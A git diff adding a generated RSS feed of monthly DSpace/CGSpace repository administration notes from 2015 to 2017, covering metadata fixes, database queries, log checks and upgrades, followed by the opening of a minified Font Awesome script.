+      <description>&lt;h2 id=&#34;2017-07-01&#34;&gt;2017-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run system updates and reboot DSpace Test&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-07-04&#34;&gt;2017-07-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge changes for WLE Phase II theme rename (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/329&#34;&gt;#329&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looking at extracting the metadata registries from ICARDA&amp;rsquo;s MEL DSpace database so we can compare fields with CGSpace&lt;/li&gt;
+&lt;li&gt;We can use PostgreSQL&amp;rsquo;s extended output format (&lt;code&gt;-x&lt;/code&gt;) plus &lt;code&gt;sed&lt;/code&gt; to format the output into quasi XML:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-06/</link>
+      <pubDate>Thu, 01 Jun 2017 10:14:52 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-06/</guid>
+      <description>2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&amp;rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &amp;ldquo;Research Themes&amp;rdquo; community will be renamed to &amp;ldquo;WLE Phase I Research Themes&amp;rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg.</description>
+    </item>
+    
+    <item>
+      <title>May, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-05/</link>
+      <pubDate>Mon, 01 May 2017 16:21:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-05/</guid>
+      <description>2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&amp;rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&amp;rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace.</description>
+    </item>
+    
+    <item>
+      <title>April, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-04/</link>
+      <pubDate>Sun, 02 Apr 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-04/</guid>
+      <description>&lt;h2 id=&#34;2017-04-02&#34;&gt;2017-04-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Merge one change to CCAFS flagships that I had forgotten to remove last month (&amp;ldquo;MANAGING CLIMATE RISK&amp;rdquo;): &lt;a href=&#34;https://github.com/ilri/DSpace/pull/317&#34;&gt;https://github.com/ilri/DSpace/pull/317&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Quick proof-of-concept hack to add &lt;code&gt;dc.rights&lt;/code&gt; to the input form, including some inline instructions/hints:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2017/04/dc-rights.png&#34; alt=&#34;dc.rights in the submission form&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Remove redundant/duplicate text in the DSpace submission license&lt;/li&gt;
+&lt;li&gt;Testing the CMYK patch on a collection with 650 items:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;#34;ImageMagick PDF Thumbnail&amp;#34; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-03/</link>
+      <pubDate>Wed, 01 Mar 2017 17:08:52 +0200</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-03/</guid>
+      <description>&lt;h2 id=&#34;2017-03-01&#34;&gt;2017-03-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Run the 279 CIAT author corrections on CGSpace&lt;/li&gt;
+&lt;/ul&gt;
+&lt;h2 id=&#34;2017-03-02&#34;&gt;2017-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace&lt;/li&gt;
+&lt;li&gt;CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles&lt;/li&gt;
+&lt;li&gt;They might come in at the top level in one &amp;ldquo;CGIAR System&amp;rdquo; community, or with several communities&lt;/li&gt;
+&lt;li&gt;I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?&lt;/li&gt;
+&lt;li&gt;Need to send Peter and Michael some notes about this in a few days&lt;/li&gt;
+&lt;li&gt;Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI&lt;/li&gt;
+&lt;li&gt;Filed an issue on DSpace issue tracker for the &lt;code&gt;filter-media&lt;/code&gt; bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: &lt;a href=&#34;https://jira.duraspace.org/browse/DS-3516&#34;&gt;DS-3516&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Discovered that the ImageMagic &lt;code&gt;filter-media&lt;/code&gt; plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK&lt;/li&gt;
+&lt;li&gt;Interestingly, it seems DSpace 4.x&amp;rsquo;s thumbnails were sRGB, but forcing regeneration using DSpace 5.x&amp;rsquo;s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see &lt;a href=&#34;https://cgspace.cgiar.org/handle/10568/51999&#34;&gt;10568/51999&lt;/a&gt;):&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-02/</link>
+      <pubDate>Tue, 07 Feb 2017 07:04:52 -0800</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-02/</guid>
+      <description>&lt;h2 id=&#34;2017-02-07&#34;&gt;2017-02-07&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;An item was mapped twice erroneously again, so I had to remove one of the mappings manually:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &amp;#39;80278&amp;#39;;
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;Create issue on GitHub to track the addition of CCAFS Phase II project tags (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/301&#34;&gt;#301&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Looks like we&amp;rsquo;ll be using &lt;code&gt;cg.identifier.ccafsprojectpii&lt;/code&gt; as the field name&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2017</title>
+      <link>https://alanorth.github.io/cgspace-notes/2017-01/</link>
+      <pubDate>Mon, 02 Jan 2017 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2017-01/</guid>
+      <description>&lt;h2 id=&#34;2017-01-02&#34;&gt;2017-01-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error&lt;/li&gt;
+&lt;li&gt;I tested on DSpace Test as well and it doesn&amp;rsquo;t work there either&lt;/li&gt;
+&lt;li&gt;I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&amp;rsquo;m not sure if we&amp;rsquo;ve ever had the sharding task run successfully over all these years&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-12/</link>
+      <pubDate>Fri, 02 Dec 2016 10:43:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-12/</guid>
+      <description>&lt;h2 id=&#34;2016-12-02&#34;&gt;2016-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace was down for five hours in the morning while I was sleeping&lt;/li&gt;
+&lt;li&gt;While looking in the logs for errors, I see tons of warnings about Atmire MQM:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;#34;dc.title&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;#34;THUMBNAIL&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;#34;-1&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;I see thousands of them in the logs for the last few months, so it&amp;rsquo;s not related to the DSpace 5.5 upgrade&lt;/li&gt;
+&lt;li&gt;I&amp;rsquo;ve raised a ticket with Atmire to ask&lt;/li&gt;
+&lt;li&gt;Another worrying error from dspace.log is:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-11/</link>
+      <pubDate>Tue, 01 Nov 2016 09:21:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-11/</guid>
+      <description>&lt;h2 id=&#34;2016-11-01&#34;&gt;2016-11-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.type&lt;/code&gt; to the output options for Atmire&amp;rsquo;s Listings and Reports module (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/286&#34;&gt;#286&lt;/a&gt;)&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/11/listings-and-reports.png&#34; alt=&#34;Listings and Reports with output type&#34;&gt;&lt;/p&gt;</description>
+    </item>
+    
+    <item>
+      <title>October, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-10/</link>
+      <pubDate>Mon, 03 Oct 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-10/</guid>
+      <description>&lt;h2 id=&#34;2016-10-03&#34;&gt;2016-10-03&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Testing adding &lt;a href=&#34;https://wiki.lyrasis.org/display/DSDOC5x/ORCID+Integration#ORCIDIntegration-EditingexistingitemsusingBatchCSVEditing&#34;&gt;ORCIDs to a CSV&lt;/a&gt; file for a single item to see if the author orders get messed up&lt;/li&gt;
+&lt;li&gt;Need to test the following scenarios to see how author order is affected:
+&lt;ul&gt;
+&lt;li&gt;ORCIDs only&lt;/li&gt;
+&lt;li&gt;ORCIDs plus normal authors&lt;/li&gt;
+&lt;/ul&gt;
+&lt;/li&gt;
+&lt;li&gt;I exported a random item&amp;rsquo;s metadata as CSV, deleted &lt;em&gt;all columns&lt;/em&gt; except id and collection, and made a new coloum called &lt;code&gt;ORCID:dc.contributor.author&lt;/code&gt; with the following random ORCIDs from the ORCID registry:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>September, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-09/</link>
+      <pubDate>Thu, 01 Sep 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-09/</guid>
+      <description>&lt;h2 id=&#34;2016-09-01&#34;&gt;2016-09-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors&lt;/li&gt;
+&lt;li&gt;Discuss how the migration of CGIAR&amp;rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace&lt;/li&gt;
+&lt;li&gt;We had been using &lt;code&gt;DC=ILRI&lt;/code&gt; to determine whether a user was ILRI or not&lt;/li&gt;
+&lt;li&gt;It looks like we might be able to use OUs now, instead of DCs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;#34;dc=cgiarad,dc=org&amp;#34; -D &amp;#34;admigration1@cgiarad.org&amp;#34; -W &amp;#34;(sAMAccountName=admigration1)&amp;#34;
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-08/</link>
+      <pubDate>Mon, 01 Aug 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-08/</guid>
+      <description>&lt;h2 id=&#34;2016-08-01&#34;&gt;2016-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add updated distribution license from Sisay (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/259&#34;&gt;#259&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Play with upgrading Mirage 2 dependencies in &lt;code&gt;bower.json&lt;/code&gt; because most are several versions of out date&lt;/li&gt;
+&lt;li&gt;Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more&lt;/li&gt;
+&lt;li&gt;bower stuff is a dead end, waste of time, too many issues&lt;/li&gt;
+&lt;li&gt;Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of &lt;code&gt;fonts&lt;/code&gt;)&lt;/li&gt;
+&lt;li&gt;Start working on DSpace 5.1 → 5.5 port:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-07/</link>
+      <pubDate>Fri, 01 Jul 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-07/</guid>
+      <description>&lt;h2 id=&#34;2016-07-01&#34;&gt;2016-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.description.sponsorship&lt;/code&gt; to Discovery sidebar facets and make investors clickable in item view (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/232&#34;&gt;#232&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I think this query should find and replace all authors that have &amp;ldquo;,&amp;rdquo; at the end of their names:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &amp;#39;(^.+?),$&amp;#39;, &amp;#39;\1&amp;#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+ text_value
+------------
+(0 rows)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In this case the select query was showing 95 results before the update&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-06/</link>
+      <pubDate>Wed, 01 Jun 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-06/</guid>
+      <description>&lt;h2 id=&#34;2016-06-01&#34;&gt;2016-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Experimenting with IFPRI OAI (we want to harvest their publications)&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html&#34;&gt;ContentDM documentation&lt;/a&gt; I found IFPRI&amp;rsquo;s OAI endpoint: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php&#34;&gt;http://ebrary.ifpri.org/oai/oai.php&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.openarchives.org/OAI/openarchivesprotocol.html&#34;&gt;OAI documentation&lt;/a&gt; and testing with an &lt;a href=&#34;http://validator.oaipmh.com/&#34;&gt;OAI validator&lt;/a&gt; I found out how to get their publications&lt;/li&gt;
+&lt;li&gt;This is their publications set: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;You can see the others by using the OAI &lt;code&gt;ListSets&lt;/code&gt; verb: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in &lt;code&gt;dc.identifier.fund&lt;/code&gt; to &lt;code&gt;cg.identifier.cpwfproject&lt;/code&gt; and then the rest to &lt;code&gt;dc.description.sponsorship&lt;/code&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-05/</link>
+      <pubDate>Sun, 01 May 2016 23:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-05/</guid>
+      <description>&lt;h2 id=&#34;2016-05-01&#34;&gt;2016-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Since yesterday there have been 10,000 REST errors and the site has been unstable again&lt;/li&gt;
+&lt;li&gt;I have blocked access to the API now&lt;/li&gt;
+&lt;li&gt;There are 3,000 IPs accessing the REST API in a 24-hour period!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &amp;#39;{print $1}&amp;#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-04/</link>
+      <pubDate>Mon, 04 Apr 2016 11:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-04/</guid>
+      <description>&lt;h2 id=&#34;2016-04-04&#34;&gt;2016-04-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit&lt;/li&gt;
+&lt;li&gt;We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc&lt;/li&gt;
+&lt;li&gt;After running DSpace for over five years I&amp;rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!&lt;/li&gt;
+&lt;li&gt;This will save us a few gigs of backup space we&amp;rsquo;re paying for on S3&lt;/li&gt;
+&lt;li&gt;Also, I noticed the &lt;code&gt;checker&lt;/code&gt; log has some errors we should pay attention to:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-03/</link>
+      <pubDate>Wed, 02 Mar 2016 16:50:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-03/</guid>
+      <description>&lt;h2 id=&#34;2016-03-02&#34;&gt;2016-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at issues with author authorities on CGSpace&lt;/li&gt;
+&lt;li&gt;For some reason we still have the &lt;code&gt;index-lucene-update&lt;/code&gt; cron job active on CGSpace, but I&amp;rsquo;m pretty sure we don&amp;rsquo;t need it as of the latest few versions of Atmire&amp;rsquo;s Listings and Reports module&lt;/li&gt;
+&lt;li&gt;Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-02/</link>
+      <pubDate>Fri, 05 Feb 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-02/</guid>
+      <description>&lt;h2 id=&#34;2016-02-05&#34;&gt;2016-02-05&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at some DAGRIS data for Abenet Yabowork&lt;/li&gt;
+&lt;li&gt;Lots of issues with spaces, newlines, etc causing the import to fail&lt;/li&gt;
+&lt;li&gt;I noticed we have a very &lt;em&gt;interesting&lt;/em&gt; list of countries on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png&#34; alt=&#34;CGSpace country list&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Not only are there 49,000 countries, we have some blanks (25)&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also, lots of things like &amp;ldquo;COTE D`LVOIRE&amp;rdquo; and &amp;ldquo;COTE D IVOIRE&amp;rdquo;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-01/</link>
+      <pubDate>Wed, 13 Jan 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-01/</guid>
+      <description>&lt;h2 id=&#34;2016-01-13&#34;&gt;2016-01-13&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Move ILRI collection &lt;code&gt;10568/12503&lt;/code&gt; from &lt;code&gt;10568/27869&lt;/code&gt; to &lt;code&gt;10568/27629&lt;/code&gt; using the &lt;a href=&#34;https://gist.github.com/alanorth/392c4660e8b022d99dfa&#34;&gt;move_collections.sh&lt;/a&gt; script I wrote last year.&lt;/li&gt;
+&lt;li&gt;I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.&lt;/li&gt;
+&lt;li&gt;Update GitHub wiki for documentation of &lt;a href=&#34;https://github.com/ilri/DSpace/wiki/Maintenance-Tasks&#34;&gt;maintenance tasks&lt;/a&gt;.&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-12/</link>
+      <pubDate>Wed, 02 Dec 2015 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-12/</guid>
+      <description>&lt;h2 id=&#34;2015-12-02&#34;&gt;2015-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace &lt;code&gt;lzop&lt;/code&gt; with &lt;code&gt;xz&lt;/code&gt; in log compression cron jobs on DSpace Test—it uses less space:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-11/</link>
+      <pubDate>Mon, 23 Nov 2015 17:00:57 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-11/</guid>
+      <description>&lt;h2 id=&#34;2015-11-22&#34;&gt;2015-11-22&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace went down&lt;/li&gt;
+&lt;li&gt;Looks like DSpace exhausted its PostgreSQL connection pool&lt;/li&gt;
+&lt;li&gt;Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &amp;#39;SELECT * from pg_stat_activity;&amp;#39; | grep idle | grep -c cgspace
+78
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js b/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js
new file mode 100644
index 000000000..bd6d61a39
--- /dev/null
+++ b/docs/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js
@@ -0,0 +1,2 @@
+/*! For license information please see fontawesome.min.js.LICENSE.txt */
+(()=>{"use strict";var t={};function n(t){return n="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},n(t)}function e(t,n){for(var e=0;e<n.length;e++){var a=n[e];a.enumerable=a.enumerable||!1,a.configurable=!0,"value"in a&&(a.writable=!0),Object.defineProperty(t,a.key,a)}}function a(t,n,e){return n in t?Object.defineProperty(t,n,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[n]=e,t}function r(t){for(var n=1;n<arguments.length;n++){var e=null!=arguments[n]?arguments[n]:{},r=Object.keys(e);"function"==typeof Object.getOwnPropertySymbols&&(r=r.concat(Object.getOwnPropertySymbols(e).filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})))),r.forEach((function(n){a(t,n,e[n])}))}return t}function i(t,n){return function(t){if(Array.isArray(t))return t}(t)||function(t,n){var e=[],a=!0,r=!1,i=void 0;try{for(var o,c=t[Symbol.iterator]();!(a=(o=c.next()).done)&&(e.push(o.value),!n||e.length!==n);a=!0);}catch(t){r=!0,i=t}finally{try{a||null==c.return||c.return()}finally{if(r)throw 